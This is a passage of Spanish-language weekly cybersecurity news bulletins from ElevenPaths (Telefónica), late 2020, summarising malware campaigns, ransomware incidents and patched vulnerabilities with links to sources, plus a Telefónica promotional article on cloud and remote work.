Qbot como preludio a infecciones del ransomware Egregor Investigadores de la compañía de seguridad Group-IB han emitido un comunicado donde afirman haber encontrado actividad que relaciona al troyano bancario Qbot (también conocido como QakBot, Pinkslipbot o Quakbot) con la distribución del ransomware Egregor. Los operadores de Qbot habrían decidido migrar su operación (antes asociada con otras familias de ransomware como ProLock) para unirse con Egregor, buscando así un mayor número de víctimas. En los tres meses de actividad desde la creación del ransomware en septiembre de 2020, Egregor ha conseguido vulnerar un total de 69 compañías, principalmente en el sector manufacturero (28.9%) y retail (14.5%), siendo una de las familias más activas desde que Maze cerró su operación el pasado mes. Asimismo, desde que Emotet decidió retomar la distribución de TrickBot en septiembre, los operadores de Qbot han tenido que distribuirse sin su ayuda, a través de campañas de phishing propias que adjuntan documentos maliciosos de Microsoft Excel. Toda la información: https://www.bleepingcomputer.com/news/security/qbot-partners-with-egregor-ransomware-in-bot-fueled-attacks/ Vulnerabilidad en la autenticación 2FA en cPanel Investigadores de seguridad de Digital Defense han descubierto un fallo de seguridad importante en cPanel, un paquete de software popular utilizado por las empresas de alojamiento web para administrar los sitios web de sus clientes. El error descubierto podría permitir a los atacantes eludir la autenticación de dos factores (2FA) para las cuentas de cPanel mediante el uso de ataques de fuerza bruta, con un coste temporal de sólo unos minutos. Digital Defense ha informado de manera privada del error al equipo de cPanel y, según el aviso de seguridad de estos últimos, el fallo en la autenticación 2FA habría sido corregido en el software cPanel & WebHost Manager (WHM) 11.92.0.2, 11.90.0.17, y 11.86.0.32. Los usuarios no deben deshabilitar la función 2FA para sus cuentas de cPanel debido a este error, sino que deben solicitar que sus proveedores de alojamiento web actualicen la instalación de cPanel a la última versión. Más detalles: https://www.digitaldefense.com/news/zero-day-cpanel-and-webhost-manager/ Nueva versión y nueva campaña del malware Trickbot El actor amenaza detrás de Trickbot ha lanzado la versión 100 del malware, que incluye nuevas características para evitar la detección. Entre las nuevas funciones que presenta, Trickbot puede inyectar ahora su DLL malicioso directamente desde la memoria en el ejecutable legítimo de Windows “wermgr.exe”. Adicionalmente, los operadores de Trickbot han lanzado una nueva herramienta de reconocimiento, denominada Lightbot, utilizada para buscar en la red de sus víctimas objetivos de alto valor. La campaña más reciente de malspam llevada a cabo por el grupo pretende la distribución de esta herramienta. El contenido de los correos utilizados como pretexto son similares a aquellos responsables de difundir BazarLoader. Éstos simulan provenir de recursos humanos o departamentos legales, refieren a quejas de clientes o finalizaciones de contrato e incluyen un adjunto que contiene un archivo javascript que ejecuta el script Powershell de Lightbot. La herramienta tiene por objeto realizar un reconocimiento superficial para determinar el valor de la víctima. Entre la información recopilada está el nombre del ordenador, información del hardware, nombre de usuario, versión de Windows, lista de controladores de dominios de Windows, PDC (Primary domain controller) de Windows, direcciones IP, DNS, tipo de tarjeta de red y un listado de los programas instalados. Toda la info: https://www.bleepingcomputer.com/news/security/trickbot-turns-100-latest-malware-released-with-new-features/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
27 de noviembre de 2020
Noticias de Ciberseguridad: Boletín semanal 14-20 de noviembre
Campaña de distribución de malware suplanta la identidad de ministerios españoles Investigadores de ESET alertan de la existencia de una campaña de distribución de malware en la que se estaría suplantando la identidad de ministerios españoles para distribuir una aplicación maliciosa para Android mediante enlaces enviados por WhatsApp. El enlace facilitado en la aplicación de mensajería llevaría a los usuarios a un dominio de reciente creación gobiernoeconomica[.]com, en el que se ofrece información acerca de supuestas ayudas económicas. Paralelamente, al acceder a la web, comienza a descargarse de forma automática un supuesto archivo PDF que en realidad es una aplicación maliciosa para Android. Toda la información: https://blogs.protegerse.com/2020/11/18/web-fraudulenta-con-supuestas-ayudas-economicas-del-gobierno-espanol-descarga-troyano-bancario-para-android/ Campaña contra organizaciones de Japón Investigadores de Symantec han descubierto una campaña contra compañías japonesas de diferentes sectores y localizadas en 17 países diferentes. Esta campaña habría estado activa durante un año, desde octubre de 2019 hasta octubre de 2020 y, de acuerdo con los investigadores, se podría atribuir a la APT Cicada, también conocida como APT10, Stone Panda, Cloud Hopper, siendo su finalidad el espionaje. Entre las técnicas utilizadas por Cicada se encuentra el uso de DLLs y la explotación de la vulnerabilidad ZeroLogon (CVE-2020-1472). Es destacable el hecho de que la APT habría estado dentro de la red de alguna de las víctimas durante casi un año, lo que evidencia la amplia cantidad de recursos y habilidades de los que disponen. Más detalles: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage Vulnerabilidades en sistemas de control industrial Los proveedores de sistemas de control industrial Real Time Automation (RTA) y Paradox han advertido recientemente de vulnerabilidades críticas que exponen sus sistemas a ataques remotos por parte de actores amenaza. Homólogamente, el proveedor Schneider Electric ha solventado nueve fallos con criticidad alta en sus sistemas SCADA. Según los investigadores de Claroty, el fallo en RTA asignado con CVE-2020-25159 se sitúa en la pila ENIP (versiones anteriores a la 2.28) que es utilizada en hasta 11 dispositivos de otros seis proveedores diferentes. Por su parte, la vulnerabilidad en Paradox asignada con CVE-2020-25189 se debe a un desbordamiento de búfer que afecta a su módulo de internet IP150. Este mismo sistema se encuentra también afectado por una segunda vulnerabilidad de importancia alta consignada como CVE-2020-25185. Finalmente, las vulnerabilidades de Schneider afectan a su sistema Interactive Graphical SCADA e incluyen errores de lectura y escritura, así como una restricción incorrecta de las operaciones dentro de los límites del búfer de memoria. CISA también ha emitido alertas sobre las vulnerabilidades críticas ya que podrían permitir la ejecución remota de código. Más info: https://threatpost.com/ics-vendors-warn-critical-bugs/161333/ Nueva campaña de ciberespionaje denominada CostaRicto Durante los últimos seis meses, el equipo de Inteligencia de Blackberry ha monitorizado una campaña de ciberespionaje dirigida contra diversas víctimas de todo el mundo. La campaña, denominada CostaRicto, parece estar operada por “hackers-for-hire”, un grupo de mercenarios APT que utilizan malware a medida y complejas capacidades de Proxy VPN y túneles SSH. Este tipo de cibercriminales que ofrecen su servicio bajo demanda se están popularizando en sofisticadas campañas financiadas por estados, aunque en esta ocasión, la diversidad de objetivos impide identificar los intereses de un solo grupo. Esta campaña se ha dirigido contra entidades de diversos sectores, prioritariamente instituciones financieras, localizadas en Europa, América, Asia, Australia, África y, especialmente, el sudeste asiático. Entre el conjunto de herramientas utilizadas en la campaña CostaRicto se identifica un malware diseñado a medida que apareció por primera vez en octubre de 2019 y que apenas había sido utilizado, por lo que podría ser exclusivo de este operador. Todos los detalles: https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
20 de noviembre de 2020
Noticias de Ciberseguridad: Boletín semanal 7-13 de noviembre
Vínculos entre Vatet, PyXie y Defray777 Investigadores de Palo Alto Networks han indagado en las familias de malware y metodologías operativas utilizadas por un actor amenaza que ha logrado pasar desapercibido mientras comprometía entidades en el sector salud, educativo, tecnológico e institucional. El grupo, en activo desde 2018 y movido por motivaciones financieras, sería el responsable de la creación de Vatet, un loader que permite la ejecución del payloads como PyXie RAT y Cobalt Strike. En algunas intrusiones puede observarse un paso previo mediante el uso de troyanos bancarios típicos como IcedID o Trickbot como punto de entrada, para posteriormente descargar Vatet y sus payloads con el objeto de realizar labores de reconocimiento y exfiltración de información antes de ejecutar en memoria el ransomware Defray777. Los investigadores estiman que este grupo es el responsable de la creación y mantenimiento de Vatet, PyXie y Defray777. Boletín de seguridad de Microsoft Microsoft ha publicado su boletín mensual de actualizaciones, conocido como Patch Tuesday, en el que la compañía ha corregido 112 vulnerabilidades en varios de sus productos. 17 vulnerabilidades han sido clasificadas como críticas, estando 12 de ellas relacionadas con errores de RCE. Entre las vulnerabilidades publicadas por la compañía de Redmond destaca la CVE-2020-17087 (CVSS 7.8): vulnerabilidad local de elevación de privilegios del kernel de Windows y que fue descubierta por Google Project Zero siendo explotada activamente. Asimismo, la vulnerabilidad crítica CVE-2020-17051 (CVSS 9.8) permite la ejecución remota de código que se encuentra en el sistema de archivos de red (NFS) de Windows. El equipo de investigadores de Automox advierten que, en los próximos días, prevén un aumento en el escaneo de puertos 2049, como consecuencia de esta vulnerabilidad. En último lugar, destacar las vulnerabilidades CVE-2020-17052 (CVSS 7.5) y CVE-2020-17053 (CVSS 7.5), que afectan a una corrupción de memoria que podrían llevar a la ejecución remota de código que se encuentra en Scripting Engine e Internet Explorer de Microsoft. Dos nuevos 0-day en Chrome Google publicó ayer la corrección de dos nuevas vulnerabilidades 0-day en su navegador Chrome que estarían siendo explotadas activamente. El primero de ellos (CVE-2020-16013) se debe a una incorrecta implementación de su motor JavaScript V8. El segundo (CVE-2020-16017) es un fallo de corrupción de memoria use-after-free en el componente de seguridad Site Isolation. Desde Google indican que tienen constancia de la existencia de exploits para estas vulnerabilidades. Con el lanzamiento de esta nueva versión del navegador (la 86.0.4240.198), Google habría corregido cinco fallos 0-day en menos de tres semanas. Distribución de malware a través de falsas actualizaciones de Microsoft Teams Según indica el medio Bleeping Computer, Microsoft estaría alertando a sus usuarios a través de una nota privada sobre una campaña de falsas actualizaciones de Microsoft Teams llevada a cabo por los operadores de ransomware. En esta campaña, los agentes amenaza estarían aprovechando anuncios maliciosos de forma que, al buscar la aplicación de Teams en los motores de búsqueda, los principales resultados llevan a un dominio bajo el control del atacante. Al acceder al enlace malicioso, se descargaría el payload oculto bajo una actualización de Teams legítima. Según Microsoft, en la mayoría de los casos, el payload inicial era el infostealer Predator the Thief, el cual permite la exfiltración de información sensible de la víctima. Sin embargo, también se han detectado los malware Bladabindi y ZLoader, así como Cobalt Strike para realizar movimiento lateral en la red infectada y posteriormente lanzar el ransomware. Nuevo malware de punto de venta contra el sector de la hostelería Investigadores de ESET han descubierto un nuevo backdoor modular, denominado ModPipe, que se dirige contra software de gestión de puntos de venta (POS) con el objetivo de robar información sensible almacenada en estos dispositivos. Esta puerta trasera afecta a los sistemas RES 3700 POS de Oracle MICROS, un software utilizado en gran cantidad de restaurantes, bares y otros establecimientos de hostelería en todo el mundo. El malware consta de un dropper mediante el cual se instala un loader para ganar persistencia. El siguiente paso consiste en implementar el módulo principal encargado de establecer comunicaciones con otros módulos descargables que permitirían, entre otras acciones, descifrar y robar contraseñas de las bases de datos, obtener los procesos en ejecución o escanear direcciones IP. Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
13 de noviembre de 2020
Noticias de Ciberseguridad: Boletín semanal 31 de octubre-6 de noviembre
Apple corrige 3 vulnerabilidades 0-day Apple, con el lanzamiento de la nueva versión de iOS 14.2, ha corregido tres vulnerabilidades 0-day que estarían siendo explotadas activamente y que afectarían a los dispositivos iPhone, iPad y iPod. Estos fallos fueron notificados a Apple por el equipo de analistas de seguridad de Google Project Zero, a quienes también se les atribuye el descubrimiento de las vulnerabilidades 0-day de Chrome y Windows notificadas recientemente. CVE-2020-27930 CVSS 6.0: es un fallo de ejecución remota de código (RCE) y se debe a un error de corrupción de memoria cuando la librería FontParser procesa una fuente maliciosa. CVE-2020-27932 CVSS 7.5: se trata de una vulnerabilidad 0-day de escalado de privilegios de kernel que permitiría a aplicaciones maliciosas ejecutar código arbitrario con dichos privilegios. CVE-2020-27950 CVSS 3.2: permitiría a aplicaciones maliciosas acceder a la memoria del kernel debido a un fallo de inicialización de la misma. Se recomienda actualizar lo antes posible a la versión iOS 14.2. Ciberataques al sector industrial a través de sistemas de gestión remota En 2018, se informó de una campaña de phishing dirigida a entidades del sector industrial, especialmente en manufactura, que pretendía la difusión de malware. Recientemente, desde el verano de 2019 hasta este mismo otoño, han podido localizar una nueva oleada de esta campaña que incluye técnicas de ataque mejoradas. Los agentes amenaza utilizan como pretexto en los correos de phishing documentos que detallan la configuración de equipamiento, procesos industriales, etc. todo ello robado a la propia empresa víctima o a uno de sus colaboradores. El malware distribuido permite a los atacantes valerse de herramientas de administración remota ocultando su utilización al usuario, e incluso usarlas como C2, tal y como ocurre con la interfaz web de la plataforma RMS en la nube. También se ha podido visualizar el uso de spyware y Mimikatz para el robo de credenciales y movimiento lateral a otros sistemas de la red. El objetivo final sigue siendo la obtención de beneficios económicos. Explotación activa de 0-day de Windows pendiente de corrección Google ha alertado sobre la explotación activa de diversos fallos de seguridad como parte de una cadena de exploits que incluyen una vulnerabilidad 0-day de Windows, que sigue pendiente de corrección, (CVE-2020-17087) y otra 0-day de Google Chrome (CVE-2020-15999), corregida el 20 de octubre en la versión 86.0.4240.111. El 0-day de Chrome se utilizó para permitir que los atacantes ejecutaran código malicioso dentro del navegador y, en una segunda fase, el 0-day de Microsoft permitía a los agente amenaza propiciar un ataque tipo sandbox escape logrando ejecutar código en el sistema operativo subyacente desde el entorno aislado de Chrome. El equipo de Google Project Zero notificó este fallo a Microsoft ofreciendo 7 días de gracia a la firma para corregir el fallo antes de publicar los detalles de la vulnerabilidad incluyendo una prueba de concepto. Según su informe, se trataría de un bug en el kernel de Windows que podría ser explotado para elevar los permisos del código del atacante y afectaría a todas las versiones desde Windows 7 hasta la más reciente de Windows 10. Se espera que el parche que corregiría la vulnerabilidad CVE-2020-17087 se haga público el 10 de noviembre en boletín de seguridad de Microsoft de noviembre. Máquinas virtuales de Windows objetivo del nuevo ransomware RegretLocker El nuevo ransomware llamado RegretLocker, que fue descubierto en octubre por los investigadores de MalwareHunterTeam, presenta peculiaridades como no utilizar una nota de rescate o hacer uso de un correo electrónico para las comunicaciones en vez de una página web en Tor. Al cifrar los archivos, RegretLocker añade la extensión .mouse a los nombres de los archivos cifrados. Aunque en apariencia sea simple, este ransomware tiene características avanzadas que no son habituales en infecciones de su familia de malware, es capaz de cifrar máquinas virtuales Windows y cerrar los archivos abiertos para su cifrado. Cuando un ransomware cifra los ficheros de una ordenador, no suele cifrar archivos de tamaños muy grandes, como máquinas virtuales, ya que reduce la velocidad de todo el proceso de cifrado, no obstante, RegretLocker utiliza la API de Windows Virtual Storage, OpenVirtualDisk, AttachVirtualDisk y GetVirtualDiskPhysicalPath para cifrar máquinas virtuales. Además, utiliza la API de Windows Restart Manager para terminar procesos o servicios de Windows que mantienen un archivo abierto durante el cifrado. Datos de 34 millones de usuarios robados de 17 compañías a la venta Según informa el medio especializado en tecnología BleepingComputer, un actor malicioso ha puesto a la venta 34 millones de registros de usuarios, afirmando que provienen de fugas de información de 17 compañías diferentes. El vendedor creó un hilo en un foro hacker el pasado 28 de octubre, detallando el tipo de información expuesta en cada una de las bases de datos. Esta información incluye correos electrónicos, contraseñas en diferentes formatos, nombres de usuario, números de teléfono, fechas de nacimiento, direcciones y otros datos sensibles. Las compañías afectadas pertenecen a un amplio abanico de sectores profesionales y localizaciones geográficas. Ninguna de ellas había reportado fugas de datos recientes, y únicamente dos de ellas lo han hecho después de que los autores del artículo contactaran con ellas: el supermercado online de Singapur RedMart y la página de reseñas de Tailandia Wongai. Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
6 de noviembre de 2020
Noticias de Ciberseguridad: Boletín semanal 24-30 de octubre
Vulnerabilidad crítica en Hewlett Packard Enterprise SSMC La compañía Hewlett Packard Enterprise ha corregido una vulnerabilidad crítica de evasión de autenticación (CVE-2020-7197, CVSS 10.0) que afecta a su software de gestión de almacenamiento StoreServ Management Console (SSMC). HPE SSMC está presente en las plataformas de almacenamiento HPE Primera y HPE 3PAR StoreServ. El fallo ha sido clasificado por la compañía con una criticidad máxima debido a que se trata de una vulnerabilidad de fácil explotación, que no requiere de la interacción del usuario y puede ser aprovechada por un atacante sin privilegios. Además, HPE ha corregido 64 vulnerabilidades que afectan a HPE Intelligent Management Center (iMC). Desde HPE se recomienda encarecidamente actualizar SSMC a la versión 3.7.1.1 o superior. Información completa: https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbst04045en_us Botnet KashmirBlack ataca sistemas de gestión de contenidos Investigadores de seguridad de Imperva, tras analizar la botnet KashmirBlack, han descubierto que estaría infectando miles de sitios web al atacar sus sistemas de gestión de contenidos (CMS). KashmirBlack controla cientos de bots, cada uno de los cuales se comunica con el C&C para recibir nuevos objetivos y realizar ataques de fuerza bruta, instalar puertas traseras y ampliar el tamaño de su red. Según los investigadores, el objetivo principal de esta botnet sería infectar sitios web para posteriormente utilizar sus servidores para el minado de criptomonedas o redirigir tráfico legítimo a páginas de spam, entre otros. Para propagarse, KashmirBlack busca sitios web con CMSs como WordPress, Magento o Joomla que ejecuten software vulnerable y utilizan exploits conocidos para explotar estos fallos. Más información: https://www.imperva.com/blog/crimeops-of-the-kashmirblack-botnet-part-i/ TrickBot amplía su actividad a dispositivos Linux El pasado 12 de octubre Microsoft informó que un conglomerado de compañías del sector tecnológico habían participado en una acción conjunta con el fin de eliminar la botnet TrickBot. Días después, la compañía de Redmond publicó que el 94% de la infraestructura había sido eliminada, pero alertaban que los agentes amenazas detrás de la botnet volverían a reactivar sus operaciones. A raíz de estos hechos, el equipo de investigadores de Netscout ha compartido nuevos hallazgos en los que señalan que los autores de TrickBot han extrapolado partes de su código a Linux, con el fin ampliar el alcance de sus víctimas. Para ello, utilizan una nueva puerta trasera de TrickBot llamada Anchor, descubierta a finales del año 2019 por investigadores de cybereason, pero que ahora se estaría empleando en dispositivos Linux y cuya función es permitir la comunicación con su Command & Control. Anchor destaca por usar el protocolo DNS para comunicarse con los servidores C2 de manera sigilosa, y cada parte de la comunicación hecha al C2 sigue una secuencia de 3 consultas DNS diferentes, siendo la última la encargada de remitir comandos al bot para ejecutar una carga útil. Según los investigadores, estas características muestran una gran complejidad en lo referido a la comunicación del C2 de Anchor, y además, las cargas útiles que el bot puede ejecutar reflejan una capacidad de innovación constante, como queda evidenciado con su cambio a Linux. Más detalles: https://www.netscout.com/blog/asert/dropping-anchor Intentos de explotación de un fallo crítico en Oracle WebLogic El 20 de octubre, Oracle publicaba su boletín de seguridad en el que se corregía un fallo crítico en los servidores Oracle WebLogic que permitiría la ejecución remota de código sin autenticación, CVE-2020-14882(CVSS 9.8). Poco después de que se hiciese público del código de explotación de esta vulnerabilidad, el Instituto de Tecnología de SANS detectó ataques contra sus honeypots en los que se trataba de explotar este fallo. En estas acciones, los agente amenaza solamente verificaban si el sistema era vulnerable. A raíz de ello, se recomiendan encarecidamente la aplicación de los parches correspondientes para corregir esta vulnerabilidad que afectaría a las siguientes versiones de Oracle WebLogic Server: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 y 14.1.1.0. Los ataques provenían de 4 direcciones IP - 114.243.211[.]18 (China Unicom), 139.162.33[.]228 (Linode, EE. UU.), 185.225.19[.]240 (MivoCloud, Moldavia) y 84.17.37[.]239 (DataCamp Ltd, Hong Kong) – y según SANS, el exploit que utilizaron estaría basado en las especificaciones técnicas de un post en un blog vietnamita que difundió el miércoles el investigador de seguridad @testanull. Toda la info: https://isc.sans.edu/diary/26734 Campañas de malware llevan a infección con ransomware Investigadores de seguridad de FireEye han realizado una publicación en la que recopilan nuevas campañas de familias de malware que funcionan siempre como droppers para finalizar con una infección de ransomware. Una de las características es su metodología de actuación, debido a que los agentes amenaza realizan su ataque a las primeras 24 horas del compromiso inicial. Asimismo, cabe indicar que los diferentes software maliciosos utilizados, como son el caso de Kegtap/Beerbot, Singlemalt/Stillbot y Winekey/Corkbot, usan la misma infraestructura de Command & Control. Los operadores de estas campañas han dirigido por el momento sus ataques a individuos de organizaciones de diferentes sectores y localizaciones geográficas. El vector de entrada de estas campañas se inicia con la remisión de correos electrónicos maliciosos que simulan ser comunicaciones corporativas genéricas y facilitan enlaces a documentos alojados en Google Docs, los cuales incluyen una nueva URL desde donde se descarga el malware. Una vez este se ejecuta en el host de la víctima inicial, los autores se sirven de cargas útiles como Powetrick y/o Cobalt Strike para realizar reconocimientos de red y el host. De esta manera pueden conocer internamente la víctima y facilitar movimientos laterales, escalar privilegios, incluso descargar y ejecutar ransomware como Ryuk. Info completa: https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
30 de octubre de 2020
4 razones por las que la nube y el teletrabajo son esenciales para tu empresa
La pandemia de la COVID-19 ha dejado más claro que nunca la necesidad de encontrar un modelo de trabajo flexible y eficiente para que todas las empresas y sus empleados puedan realizar sus funciones desde cualquier lugar. La adaptación a ese cambio de paradigma y de metodología de trabajo se veía lejano y nadie esperaba tener que apostar por ese modelo tan pronto pese a las recomendaciones de muchos expertos. El futuro del teletrabajo se ha visto acelerado por motivo de la crisis mundial y durante los primeros meses, empresas de todo tipo se han sentido vulnerables si estaban escasamente preparadas para la situación, llevándolas a cambiar su estructura laboral para sobrevivir. Para que sirva de algo lo pasado, aquí mostramos las 4 razones fundamentales para garantizar la sostenibilidad y seguridad de un negocio, extraídas del análisis de la situación actual: El momento de adaptarse es ahora Un gran número de las empresas que hoy en día siguen abiertas, ya han interiorizado una nueva manera de trabajar adaptada a las circunstancias actuales, intentando mantener la eficiencia operativa de su negocio ante cada adversidad. Como indicábamos antes, es cuestión de renovarse o morir. Esto ha quedado claro durante la pandemia, en la cual 90.000 empresas han echado el cierre de manera indefinida, según afirma la Seguridad Social Española. En tan sólo 5 meses, España, con un número de empresas en torno a 1.3 millones, ha perdido una parte crucial del tejido productivo, lo cual posiblemente se podría haber evitado si estas empresas hubiesen estado dotadas de las herramientas necesarias para circunstancias como ésta. Más vale ser previsor y estar preparado para algo que puede no llegar, que no estarlo para algo que llega. En toda crisis se pueden encontrar oportunidades, y en este caso se ha abierto una puerta a las empresas para beneficiarse de la nube, la cual garantizará la continuidad del negocio y facilitará la coordinación en cualquier tipo de circunstancia. El teletrabajo funciona El trabajo en remoto ha supuesto un cambio de paradigma en la manera en la que trabajamos actualmente. No sólo ha conseguido mantener la continuidad de todo tipo de negocios, sino que, haya pandemia o no, se ha integrado de tal manera que será imposible ignorarlo de ahora en adelante. Tras el estudio de GlobalData de mayo de este año, se ha demostrado que el 68% de quienes buscan trabajo dicen que la opción de trabajar desde casa influirá en gran medida sobre su interés por trabajar para una compañía. La realidad es que, muchas empresas tendrán que cambiar de mentalidad y flexibilizar aún más el puesto de trabajo de sus empleados, si quieren atraer más talento y mantener el que actualmente tienen, haciendo más eficiente y productivo su trabajo diario. Otro dato interesante, es el de la eficiencia y la productividad en el puesto de trabajo remoto, donde tanto empresas como empleados han experimentado mejoras. El 85% de empresas afirman que su productividad ha aumentado a raíz de una mayor flexibilidad. Así lo afirma una encuesta global de IWG (International Workplace Group), llevada a cabo en 2019. Desde el punto de vista del empleado también hay beneficios aparentes. Según un estudio de CoSo Cloud del año 2015, ya en ese entonces el 77% de los que trabajaban en remoto afirmaban ser más productivos cuando trabajan desde casa. Sin duda alguna, la continuidad de los negocios respaldada por la nube se está convirtiendo en un estándar, algo necesario para funcionar y prosperar sin importar las circunstancias. Un negocio dotado con servicios Cloud, es un negocio a prueba de balas de todos los colores y tamaños. El motor es la nube El estudio de GlobalData mencionado anteriormente, también afirma lo siguiente; el 65% de los negocios dicen que adoptar un trabajo flexible les ayuda a reducir los gastos operacionales y de capital, gestionando el riego y consolidando su portfolio. Dada la situación económica en la que nos estamos viendo inmersos, es necesario priorizar los gastos en las áreas más rentables de IT. La inversión en plataformas basadas en la nube está creciendo frente al declive en otras áreas. La nube, al ser un sistema híbrido y flexible, es la mejor elección ante escenarios nuevos y cambiantes, convirtiéndola en una inversión imprescindible tras la pandemia. Gracias al desarrollo de sistemas multicloud, cloud híbrida, cloud pública y cloud privada, todas las empresas, ya sean grandes o pequeñas, pueden escoger la que más se ajusta a sus necesidades, pudiendo variar los recursos en base a los requerimientos de cada momento. Pero tan importante es migrar a la nube, como tener un partner que te ayude en su implementación de manera eficaz. Un correcto ajuste inicial en la infraestructura que contrates te asegura que tengas un control seguro y eficiente de tus sistemas y documentos. Evolucionamos cada vez más rápido De acuerdo con una encuesta de Gartner llevada a cabo en marzo de este año, el 74% de las empresas planean flexibilizar el puesto de trabajo de sus empleados de manera permanente en el período Post-COVID. Esto supone un gran avance en la cultura de las empresas, en un tiempo récord. Satya Nadella, el CEO de Microsoft afirma que “hemos visto dos años de transformación digital en dos meses.”, y no le falta razón. Las reuniones de trabajo por videoconferencia ya es algo más que habitual y lo hemos interiorizado sin darnos cuenta. Hemos automatizado el vestirnos y arreglarnos, sentarnos en nuestro escritorio y ponernos manos a la obra. Ya organizamos nuestro día sin contar con el tráfico ni el tiempo que tardemos en aparcar… La nube nos ha permitido dar un salto y subirnos a ella, y visto lo visto, no nos queremos bajar. Telefónica, tu experto en la nube Gracias al buen respaldo en Cloud que tenemos en Telefónica, podemos afrontar este nuevo ecosistema sin dificultades. Entendimos desde un principio la necesidad de apostar por esta tecnología, y creemos que la mayoría de los negocios deben hacer lo mismo. El trabajo en remoto no sólo marca la diferencia en cuanto a transformación digital, sino también a nivel de gastos. Por ello, en Telefónica trabajamos para facilitar la adaptación de pequeñas y grandes empresas al entorno Cloud, bajo la supervisión de los profesionales mejor formados, los cuales se adaptan a las necesidades concretas de cada cliente. Somos la mejor opción para acompañar y ayudar a sacar el mejor partido de la transformación digital de cada empresa. Si quieres conocer más detalles sobre el futuro de la nube y el trabajo remoto según Telefónica, descúbrelo en este documento: El Futuro del Lugar de Trabajo. Y si quieres conocer todos los servicios que Telefónica puede brindarte a la hora de implantar trabajo remoto en tu empresa para tus empleados, visita nuestra página. Imagen principal: C Dustin
28 de octubre de 2020
Noticias de Ciberseguridad: Boletín semanal 17-23 de octubre
Nuevo troyano bancario denominado Vizom El equipo de investigadores de IBM Security Trusteer ha publicado un informe en el que analiza el nuevo troyano bancario de la “familia brasileña” denominado Vizom. Este software malicioso emplea técnicas similares a otros troyanos bancarios, como es la superposición de una pantalla que se genera cuando la víctima inicia sesión y realiza transacciones bancarias con el objetivo de exfiltrar dicha información, funciones de Keylogger, así como de hacer capturas de pantalla. Asimismo, Vizom destaca por la forma en que se infecta e implementa en los dispositivos de las víctimas, debido a que se ofusca como un software de videoconferencias legítimo, lo que garantiza que el sistema operativo ejecute sus DLL maliciosos permitiendo la infiltración en directorios legítimos de dispositivos que utilizan Windows. El vector de entrada utilizado por agentes amenaza en mediante la remisión de correos maliciosos en los que se adjunta un archivo malicioso. Otro aspecto a destacar es el mecanismo utilizado para crear persistencia, para ello Vizom modifica los accesos directos del navegador con el fin de que, sin importar qué navegador se utilice, se ejecute en segundo plano el navegador legítimo Vivaldi, que en realidad se trata de un proceso malicioso. De esta manera, se exfiltra la información robada y se transmite a su Command & Control. Más información: https://securityintelligence.com/posts/vizom-malware-targets-brazilian-bank-customers-remote-overlay Google corrige vulnerabilidad 0-day Google ha lanzado una actualización de seguridad que corrige cinco fallos en su navegador Google Chrome, incluyendo una vulnerabilidad 0-day que estaría siendo activamente explotada. Esta última vulnerabilidad (CVE-2020-15999) se trata de un fallo de corrupción de memoria en la librería de renderizado de fuentes FreeType, la cual se incluye por defecto en Chrome. Según Ben Hawkes, líder del equipo Project Zero de Google, los actores amenaza estarían explotando este error en la librería para llevar a cabo ataques contra usuarios de Chrome. Se recomienda actualizar el navegador Google Chrome a la versión 86.0.4240.111. Además, se ha corregido el fallo en la versión 2.10.4 de FreeType. Más información: https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html Incidente de ransomware en Sopra Steria A primera hora de la tarde de ayer, el medio Le Mag IT informaba de un incidente de ransomware en Sopra Steria que habría afectado al directorio activo de la compañía, logrando cifrar una parte de los sistemas de información de la consultora. La compañía ha confirmado a través de un comunicado oficial que el ataque se detectó la noche del 20 de octubre y que se tomaron medidas para limitar el riesgo de propagación. Sopra Steria ha trasladado, además, que está en estrecho contacto con sus clientes y socios, así como con las autoridades competentes. Todavía no se tiene una confirmación oficial sobre la familia de ransomware que habría provocado el incidente. Sin embargo, el periodista Tristan Brossat aseguraba a primera hora de la tarde que se trataría del ransomware Erica, mientras que el medio que ha difundido la noticia, Le Mag IT, ha actualizado la información sobre el incidente informando que este ataque estaría relacionado con el ransomware Ryuk. Se espera que durante las próximas horas se publique más información sobre el grado de afectación y las posibles causas de este incidente. Más información: https://www.lemagit.fr/actualites/252490877/Sopra-Steria-frappe-par-un-ransomware Vulnerabilidades de elevación de privilegios en Citrix Gateway Plug-in Citrix ha actualizado su boletín de seguridad con dos nuevas vulnerabilidades (CVE-2020-8257 y CVE-2020-8258) en Citrix Gateway Plug-in para sistemas Windows. Los investigadores de seguridad de Cymptom han analizado dichas vulnerabilidades y han publicado pruebas de concepto. De ser explotadas, estas vulnerabilidades podrían dar lugar a que un usuario local eleve sus privilegios a SYSTEM. El cliente de Citrix Gateway instala un servicio que se ejecuta como SYSTEM, el cual ejecuta un script en PowerShell cada 5 minutos. El fallo reside en que la llamada a PowerShell no se realiza al path 